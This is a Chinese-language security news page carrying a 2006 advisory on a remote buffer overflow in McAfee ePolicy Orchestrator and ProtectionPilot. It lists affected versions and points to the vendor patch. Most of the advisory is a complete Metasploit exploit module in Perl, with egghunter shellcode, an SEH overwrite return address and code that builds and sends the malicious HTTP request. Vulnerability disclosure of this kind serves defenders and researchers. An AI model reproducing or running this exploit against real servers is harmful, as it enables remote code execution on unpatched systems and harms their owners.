首页 | 邮件资讯 | 技术教程 | 解决方案 | 产品评测 | 邮件人才 | 邮件博客 | 邮件系统论坛 | 软件下载 | 邮件周刊 | 热点专题 | 工具
网络技术 | 操作系统 | 邮件系统 | 客户端 | 电子邮箱 | 反垃圾邮件 | 邮件安全 | 邮件营销 | 移动电邮 | 邮件软件下载 | 电子书下载

邮件网络安全

系统安全 | 邮件软件漏洞 | 攻防技术 | 安全基础 | 病毒公告 | 病毒查杀 | Forefront/TMG/ISA | 防火墙 | 数字签名 |
首页 > 邮件网络安全 > 邮件软件漏洞 > McAfee EPolicy Orchestrator缓冲区溢出漏洞 > 正文

McAfee EPolicy Orchestrator缓冲区溢出漏洞

出处:绿盟科技 作者:绿盟科技 时间:2006-10-4 22:37:00
发布日期:2006-10-03
更新日期:2006-10-03

受影响系统:
McAfee ePolicy Orchestrator <= 3.5 patch 5
McAfee ProtectionPilot 1.1.1
McAfee ProtectionPilot 1.1
不受影响系统:
McAfee ePolicy Orchestrator 3.5 patch 6
McAfee ProtectionPilot 1.1.1 patch 3
描述:
BUGTRAQ  ID: 20288

McAfee Security ePolicy Orchestrator是一款企业级反病毒管理工具。

ePolicy Orchestrator及ProtectionPilot所带的HTTP Server在处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

ePolicy Orchestrator及ProtectionPilot在处理HTTP请求中的超长Source头选项数据时存在缓冲区溢出,远程攻击者可能通过超长的精心构造的数据溢出缓冲区执行任意指令。

<**>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::mcafee_epolicy_source;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };

my $info =
  {
    'Name'     => 'McAfee ePolicy Orchestrator / ProtPilot Source Overflow',
    'Version'  => '$Revision: 1.0 $',
    'Authors'  =>
      [
        'muts <muts [at] remote-exploit.org>',
        'xbxice[at]yahoo.com',
        'H D Moore <hdm [at] metasploit.com>'
      ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32', 'win2000', 'win2003' ],
    'Priv'  => 0,

    'AutoOpts'  => { 'EXITFUNC' => 'thread' },
    'UserOpts'  =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 81],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
      },

    'Payload' =>
      {
        # Space is almost unlimited, but 1024 is fine for now
        'Space'     => 1024,
        'BadChars'  => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\xff",
        'Keys'      => ['+ws2ord'],
      },

    'Description'  => Pex::Text::Freeform(qq{
    This is a stack overflow exploit for McAfee ePolicy Orchestrator 3.5.0
    and ProtectionPilot 1.1.0. Tested on Windows 2000 SP4 and Windows 2003 SP1.
    This module is based on the exploit by xbxice and muts.
}),

    'Refs'  =>
      [
        ['URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
      ],

    'DefaultTarget' => 0,
    'Targets' =>
      [
        ['Windows 2000/2003 ePo 3.5.0/ProtectionPilot 1.1.0', 96, 0x601EDBDA], # pop pop ret xmlutil.dll
      ],

    'Keys' => ['epo'],

    'DisclosureDate' => 'Jul 17 2006',
  };

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];

    # Use a egghunter stub to find the payload
    my $eggtag  = Pex::Text::AlphaNumText(4);
    my $egghunt =
      "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
      "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
      $eggtag .
      "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

    # Create the 64-byte GUID
    my $guid = Pex::Text::AlphaNumText(64);

    # Create the 260 byte Source header
    my $evil = Pex::Text::AlphaNumText(260);

    #
    # A long Source header results in a handful of exceptions.
    # The first exception occurs with a pointer at offset 116.
    # This exception occurs because a function pointer is
    # dereferenced from the overwritten data and then called:
    #  naisp32!naSPIPE_MainWorkFunc+0x3ed:
    #    mov ecx, [eax+0x270] (eax is offset 116)
    #    push ecx
    #    call [eax+0x26c]
    #
    # When this happens, the first SEH in the chain is also
    # overwritten at offset 96, so the exception results
    # in our code being called. If we knew of an address
    # in memory that pointed to our shellcode, we could
    # avoid the SEH completely and use the above call to
    # execute our code. This is actually practical, since
    # we can upload almost arbitrary amounts of data into
    # the heap and then overwrite the function pointer above.
    #
    # This method is left as an excercise to the reader.
    #
    # This module will use the SEH overwrite with a pop/pop/ret or
    # a jmp/call ebx (2000 only) to gain control of execution. This
    # removes the need for a large data upload and should result in
    # reliable execution without the need to brute force.
    #
    # Since the SEH method only leaves ~140 bytes of contiguous
    # shellcode space, we use an egghunter to find the real
    # payload that we stuffed into the heap as POST data.
    #

    # Trigger the exception by passing a bad pointer
    substr($evil, $target->[1] + 20, 4, Pex::Text::AlphaNumText(3)."\xff");

    # Return to pop/pop/ret or equivalent
    substr($evil, $target->[1], 4, pack('V', $target->[2]));

    # Jump to the egghunter
    substr($evil, $target->[1] - 4, 2, "\xeb\x1a");

    # Egghunter has 140 bytes of room to work
    substr($evil, $target->[1] + 24, length($egghunt), $egghunt);

    # Create our post data containing the shellcode
    my $data = Pex::Text::AlphaNumText(int(rand(500)+32));

    # Embed the search tag and shellcode
    $data .= ($eggtag x 2) . $shellcode;

    # Add some extra padding
    $data .=  Pex::Text::AlphaNumText(int(rand(500)+32));

    my $req = "GET /spipe/pkg HTTP/1.0\r\n";
    $req .="User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n";
    $req .="Content-Length: ". length($data). "\r\n";
    $req .="AgentGuid=${guid}\r\n";
    $req .="Source=${evil}\r\n";
    $req .= "\r\n";
    $req .= $data;

    $self->PrintLine(sprintf("[*] Trying ".$target->[0]." using 0x%.8x...", $target->[2]));

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    $s->Send($req);

    $self->PrintLine("[*] Waiting up to two minutes for the egghunter...");
    $s->Recv(-1, 120);
    $self->Handler($s);
    $s->Close;
    return;
}

1;

建议:
厂商补丁:

McAfee
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mcafee.com
相关文章 热门文章
  • McAfee Email Gateway 6.7.2 Hotfix 2更新修复多个安全漏洞
  • McAfee:黑客利用电子邮件诈骗Facebook用户
  • McAfee CEO:垃圾邮件等于恶意软件
  • McAfee完成对邮件归档厂商MX LOGIC的收购
  • McAfee警告Google Code遭垃圾邮件滥用
  • McAfee 为 Microsoft Exchange 和 Lotus Domino 推出 GroupShield 7
  • Symantec与McAfee推移动平台安全方案
  • McAfee预测:2007年度十大安全威胁名单
  • McAfee推Exchange Server07安全解决方案
  • McAfee SiteAdvisor支持Firefox、AIM和AOL Mail
  • KERIO MAILSERVER内建MCAFEE杀毒引擎的正常使用
  • Linux 下安装 McAfee VirusScan
  • Exchange Server 2003 中的弱点会导致权限提升
  • 更安全稳定!快下载微软ISA 2000 SP2
  • MDaemon 7.2发现权限提升漏洞
  • Exchange 2003 Server发布新补丁KB883543
  • 微软发布关于Exchange漏洞紧急公告
  • MS05-021:Exchange Server漏洞远程执行代码
  • WebAdmin 3.0.2 跨站脚本、HTML注入安全漏洞
  • Imail Server IMAP EXAMINE命令缓冲区溢出漏洞
  • Open WebMail Email存在头字段HTML代码注入漏洞
  • 微软发布关于Exchange 5.5 漏洞更新公告
  • IMail 8.13远程DELETE命令缓冲区溢出漏洞
  • MS04-035:SMTP中安全漏洞可能允许执行远程代码
  • 自由广告区
     
    最新软件下载
  • SharePoint Server 2010 部署文档
  • Exchange 2010 RTM升级至SP1 教程
  • Exchange 2010 OWA下RBAC实现的组功能...
  • Lync Server 2010 Standard Edition 标..
  • Lync Server 2010 Enterprise Edition...
  • Forefront Endpoint Protection 2010 ...
  • Lync Server 2010 Edge 服务器部署文档
  • 《Exchange 2003专家指南》
  • Mastering Hyper-V Deployment
  • Windows Server 2008 R2 Hyper-V
  • Microsoft Lync Server 2010 Unleashed
  • Windows Server 2008 R2 Unleashed
  • 今日邮件技术文章
  • 腾讯,在创新中演绎互联网“进化论”
  • 华科人 张小龙 (中国第二代程序员 QQ...
  • 微软推出新功能 提高Hotmail密码安全性
  • 快压技巧分享:秒传邮件超大附件
  • 不容忽视的邮件营销数据分析过程中的算..
  • 国内手机邮箱的现状与未来发展——访尚..
  • 易观数据:2011Q2中国手机邮箱市场收入..
  • 穿越时空的爱恋 QQ邮箱音视频及贺卡邮件
  • Hotmail新功能:“我的朋友可能被黑了”
  • 入侵邻居网络发骚扰邮件 美国男子被重..
  • 网易邮箱莫子睿:《非你莫属》招聘多过..
  • 中国电信推广189邮箱绿色账单
  • 最新专题
  • 鸟哥的Linux私房菜之Mail服务器
  • Exchange Server 2010技术专题
  • Windows 7 技术专题
  • Sendmail 邮件系统配置
  • 组建Exchange 2003邮件系统
  • Windows Server 2008 专题
  • ORF 反垃圾邮件系统
  • Exchange Server 2007 专题
  • ISA Server 2006 教程专题
  • Windows Vista 技术专题
  • “黑莓”(BlackBerry)专题
  • Apache James 专题
  • 分类导航
    邮件新闻资讯:
    IT业界 | 邮件服务器 | 邮件趣闻 | 移动电邮
    电子邮箱 | 反垃圾邮件|邮件客户端|网络安全
    行业数据 | 邮件人物 | 网站公告 | 行业法规
    网络技术:
    邮件原理 | 网络协议 | 网络管理 | 传输介质
    线路接入 | 路由接口 | 邮件存储 | 华为3Com
    CISCO技术 | 网络与服务器硬件
    操作系统:
    Windows 9X | Linux&Uinx | Windows NT
    Windows Vista | FreeBSD | 其它操作系统
    邮件服务器:
    程序与开发 | Exchange | Qmail | Postfix
    Sendmail | MDaemon | Domino | Foxmail
    KerioMail | JavaMail | Winwebmail |James
    Merak&VisNetic | CMailServer | WinMail
    金笛邮件系统 | 其它 |
    反垃圾邮件:
    综述| 客户端反垃圾邮件|服务器端反垃圾邮件
    邮件客户端软件:
    Outlook | Foxmail | DreamMail| KooMail
    The bat | 雷鸟 | Eudora |Becky! |Pegasus
    IncrediMail |其它
    电子邮箱: 个人邮箱 | 企业邮箱 |Gmail
    移动电子邮件:服务器 | 客户端 | 技术前沿
    邮件网络安全:
    软件漏洞 | 安全知识 | 病毒公告 |防火墙
    攻防技术 | 病毒查杀| ISA | 数字签名
    邮件营销:
    Email营销 | 网络营销 | 营销技巧 |营销案例
    邮件人才:招聘 | 职场 | 培训 | 指南 | 职场
    解决方案:
    邮件系统|反垃圾邮件 |安全 |移动电邮 |招标
    产品评测:
    邮件系统 |反垃圾邮件 |邮箱 |安全 |客户端
    广告联系 | 合作联系 | 关于我们 | 联系我们 | 繁體中文
    版权所有:邮件技术资讯网©2003-2010 www.5dmail.net, All Rights Reserved
    www.5Dmail.net Web Team   粤ICP备05009143号